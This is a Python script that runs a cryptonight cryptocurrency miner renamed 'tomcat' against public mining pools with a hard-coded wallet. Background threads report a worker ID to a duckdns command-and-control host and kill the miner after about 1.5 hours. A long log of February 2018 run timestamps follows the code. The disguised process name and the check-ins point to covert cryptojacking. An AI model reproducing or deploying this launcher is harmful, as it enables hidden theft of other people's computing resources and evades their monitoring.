import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:10:01.358519
#2018-02-17 15:56:05.352673
#2018-02-17 17:44:06.736360
#2018-02-17 19:32:06.050988
#2018-02-17 21:22:03.731721
#2018-02-17 23:06:06.000320
#2018-02-18 00:53:05.895838
#2018-02-18 02:41:07.645703
#2018-02-18 04:29:05.247984
#2018-02-18 06:21:01.819914
#2018-02-18 08:10:01.615743
#2018-02-18 09:57:01.567730
#2018-02-18 11:45:01.656946
#2018-02-18 13:31:01.511407
#2018-02-18 15:21:04.829029
#2018-02-18 17:10:08.547750
#2018-02-18 18:58:04.168056
#2018-02-18 20:45:08.361715
#2018-02-18 22:31:05.249405
#2018-02-19 00:19:04.847744
#2018-02-19 02:05:03.805983
#2018-02-19 03:52:07.399174
#2018-02-19 05:37:05.229992
#2018-02-19 07:24:02.058573
#2018-02-19 09:13:06.992593
#2018-02-19 11:01:08.060031
#2018-02-19 12:48:06.673978
#2018-02-19 14:35:06.907109
#2018-02-19 16:23:01.505273
#2018-02-19 18:10:11.245884
#2018-02-19 19:56:07.602387
#2018-02-19 21:43:06.312602
#2018-02-19 23:31:01.459169
#2018-02-20 01:17:07.526361
#2018-02-20 03:07:06.898722
#2018-02-20 04:54:01.299735
#2018-02-20 06:36:07.410061
#2018-02-20 08:21:07.135272
#2018-02-20 10:07:04.190192
#2018-02-20 11:52:05.136794
#2018-02-20 13:41:07.776559
#2018-02-20 15:25:04.201576
#2018-02-20 17:10:05.591302
#2018-02-20 19:01:04.579783
#2018-02-20 20:51:05.638453
#2018-02-20 22:36:08.460076
#2018-02-21 00:17:06.431860
#2018-02-21 02:05:03.768657
#2018-02-21 03:52:01.676498
#2018-02-21 05:39:01.804692
#2018-02-21 07:27:07.485835
#2018-02-21 09:12:07.531699
#2018-02-21 11:00:05.638495
#2018-02-21 12:47:08.782755
#2018-02-21 14:35:11.877725
#2018-02-21 16:23:04.970842
#2018-02-21 18:14:08.250249
#2018-02-21 19:59:07.017775
#2018-02-21 21:47:08.335245
#2018-02-21 23:35:08.052180
#2018-02-22 01:23:07.264767
#2018-02-22 03:11:04.865803
#2018-02-22 04:58:04.948341
#2018-02-22 06:43:01.671594
#2018-02-22 08:31:05.686113
#2018-02-22 10:19:06.906631
#2018-02-22 12:04:10.973806
#2018-02-22 13:51:01.344533
#2018-02-22 15:39:05.421102
#2018-02-22 17:25:06.339518
#2018-02-22 19:12:09.506453
#2018-02-22 21:05:07.048688
#2018-02-22 23:58:07.881046
#2018-02-23 01:45:08.827430
#2018-02-23 03:35:07.249821
#2018-02-23 05:20:09.400468
#2018-02-23 07:07:04.437431
#2018-02-23 08:56:05.330713
#2018-02-23 11:15:07.786952
#2018-02-23 13:09:06.662036
#2018-02-23 14:55:11.090409
#2018-02-23 16:44:09.176323
#2018-02-23 18:31:03.999990
#2018-02-23 20:18:06.645077
#2018-02-23 22:06:07.817513
#2018-02-23 23:54:02.248266
#2018-02-24 01:43:04.989845
#2018-02-24 03:35:09.062086
#2018-02-24 05:20:01.260584
#2018-02-24 07:08:05.965876
#2018-02-24 08:55:09.392541
#2018-02-24 10:55:02.848204
#2018-02-24 12:44:06.591481
#2018-02-24 14:34:01.664829
#2018-02-24 16:20:01.393993
#2018-02-24 18:14:03.556148
#2018-02-24 20:01:04.583784
#2018-02-24 21:44:04.927436
#2018-02-25 00:41:05.487183
#2018-02-25 04:36:06.870371
#2018-02-25 08:02:01.603758